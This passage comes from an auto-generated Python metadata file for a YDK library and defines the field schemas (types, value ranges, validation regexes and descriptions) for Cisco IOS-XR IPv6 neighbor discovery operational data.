[(0, 4294967295)], [],
''' Total number of entries
''',
'total_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'neighbor-summary',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age',
False,
[
_MetaInfoClassMember('seconds', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Number of seconds
''',
'seconds',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'age',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The bundle node name
''',
'node_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('age', REFERENCE_CLASS, 'Age' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age',
[], [],
''' Uptime of node (secs)
''',
'age',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('process-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Process Name
''',
'process_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('received-packets', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total packet receives
''',
'received_packets',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('received-sequence-number', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Received sequence num
''',
'received_sequence_number',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('sent-packets', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total packet sends
''',
'sent_packets',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('sent-sequence-number', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Sent sequence num
''',
'sent_sequence_number',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('state', REFERENCE_ENUM_CLASS, 'Ipv6NdBndlStateEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdBndlStateEnum',
[], [],
''' State
''',
'state',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('state-changes', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' State changes
''',
'state_changes',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-node',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleNodes' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleNodes',
False,
[
_MetaInfoClassMember('bundle-node', REFERENCE_LIST, 'BundleNode' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode',
[], [],
''' IPv6 ND operational data for a specific
bundle node
''',
'bundle_node',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-nodes',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters',
False,
[
_MetaInfoClassMember('complete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed GLEAN entry count
''',
'complete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('complete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed PROTO entry Count
''',
'complete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dad-attempts', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' DAD attempt count
''',
'dad_attempts',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-glean-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped GLEAN entry lequest count
''',
'dropped_glean_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-protocol-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped PROTO entry request count
''',
'dropped_protocol_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete GLEAN entry count
''',
'incomplete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete PROTO entry count
''',
'incomplete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dad-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, DAD (D.. A.. D..) is enabled otherwise
it is disabled
''',
'is_dad_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dhcp-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used for utilising DHCP
''',
'is_dhcp_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-icm-pv6-redirect', ATTRIBUTE, 'bool' , None, None,
[], [],
''' ICMP redirect flag
''',
'is_icm_pv6_redirect',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-route-address-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used to manage routable address
''',
'is_route_address_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-suppressed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Suppress flag
''',
'is_suppressed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-advertisement-lifetime', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement life time in sec
''',
'nd_advertisement_lifetime',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-cache-limit', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed adjacency limit per interface
''',
'nd_cache_limit',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-max-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement maximum transmit
interval in sec
''',
'nd_max_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-min-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement minimum transmit
interval in sec
''',
'nd_min_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-reachable-time', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Time to reach ND in msec
''',
'nd_reachable_time',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-retransmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND retransmit interval in msec
''',
'nd_retransmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nd-parameters',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'local-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'global-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' Node Name
''',
'node_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('total-links', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Number of links on the node
''',
'total_links',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'member-node',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('etype', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' etype
''',
'etype',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('global-address', REFERENCE_LIST, 'GlobalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress',
[], [],
''' List of ND global addresses
''',
'global_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('iftype', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Interface type
''',
'iftype',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-interface-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, interface is enabled
''',
'is_interface_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-ipv6-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, IPv6 is enabled
''',
'is_ipv6_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-mpls-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, MPLS is enabled
''',
'is_mpls_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('local-address', REFERENCE_CLASS, 'LocalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress',
[], [],
''' Link local address
''',
'local_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('mac-addr', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' mac address
''',
'mac_addr',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('mac-addr-size', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' mac address size
''',
'mac_addr_size',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('member-link', REFERENCE_LEAFLIST, 'int' , None, None,
[(0, 4294967295)], [],
''' List of member links
''',
'member_link',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('member-node', REFERENCE_LIST, 'MemberNode' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode',
[], [],
''' List of member nodes
''',
'member_node',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('mtu', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' MTU
''',
'mtu',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-parameters', REFERENCE_CLASS, 'NdParameters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters',
[], [],
''' ND interface parameters
''',
'nd_parameters',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('parent-interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Parent interface name
''',
'parent_interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('vlan-tag', ATTRIBUTE, 'int' , None, None,
[(0, 65535)], [],
''' vlan tag/id/ucv
''',
'vlan_tag',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-interface',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces',
False,
[
_MetaInfoClassMember('bundle-interface', REFERENCE_LIST, 'BundleInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface',
[], [],
''' IPv6 ND operational data for a specific
bundler interface
''',
'bundle_interface',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('complete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed GLEAN entry count
''',
'complete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('complete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed PROTO entry Count
''',
'complete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dad-attempts', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' DAD attempt count
''',
'dad_attempts',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-glean-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped GLEAN entry lequest count
''',
'dropped_glean_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-protocol-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped PROTO entry request count
''',
'dropped_protocol_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete GLEAN entry count
''',
'incomplete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete PROTO entry count
''',
'incomplete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dad-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, DAD (D.. A.. D..) is enabled otherwise
it is disabled
''',
'is_dad_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dhcp-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used for utilising DHCP
''',
'is_dhcp_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-icm-pv6-redirect', ATTRIBUTE, 'bool' , None, None,
[], [],
''' ICMP redirect flag
''',
'is_icm_pv6_redirect',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-route-address-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used to manage routable address
''',
'is_route_address_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-suppressed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Suppress flag
''',
'is_suppressed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-advertisement-lifetime', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement life time in sec
''',
'nd_advertisement_lifetime',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-cache-limit', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed adjacency limit per interface
''',
'nd_cache_limit',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-max-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement maximum transmit
interval in sec
''',
'nd_max_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-min-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement minimum transmit
interval in sec
''',
'nd_min_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-reachable-time', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Time to reach ND in msec
''',
'nd_reachable_time',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-retransmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND retransmit interval in msec
''',
'nd_retransmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.Interfaces' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface',
[], [],
''' IPv6 node discovery operational data for a
specific node and interface
''',
'interface',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'local-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'vr-global-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('context', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Virtual Router ID
''',
'context',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('flags', REFERENCE_ENUM_CLASS, 'Ipv6NdShVrFlagsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdShVrFlagsEnum',
[], [],
''' VR Flags
''',
'flags',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('link-layer-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Link-Layer Address
''',
'link_layer_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('local-address', REFERENCE_CLASS, 'LocalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress',
[], [],
''' Link local address
''',
'local_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('state', REFERENCE_ENUM_CLASS, 'Ipv6NdShVrStateEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdShVrStateEnum',
[], [],
''' VR state
''',
'state',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('vr-gl-addr-ct', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Virtual Global Address Count
''',
'vr_gl_addr_ct',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('vr-global-address', REFERENCE_LIST, 'VrGlobalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress',
[], [],
''' List of ND global addresses
''',
'vr_global_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nd-virtual-router',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters',
False,
[
_MetaInfoClassMember('nd-virtual-router', REFERENCE_LIST, 'NdVirtualRouter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter',
[], [],
''' IPv6 ND virtual router operational data for
a specific interface
''',
'nd_virtual_router',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nd-virtual-routers',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
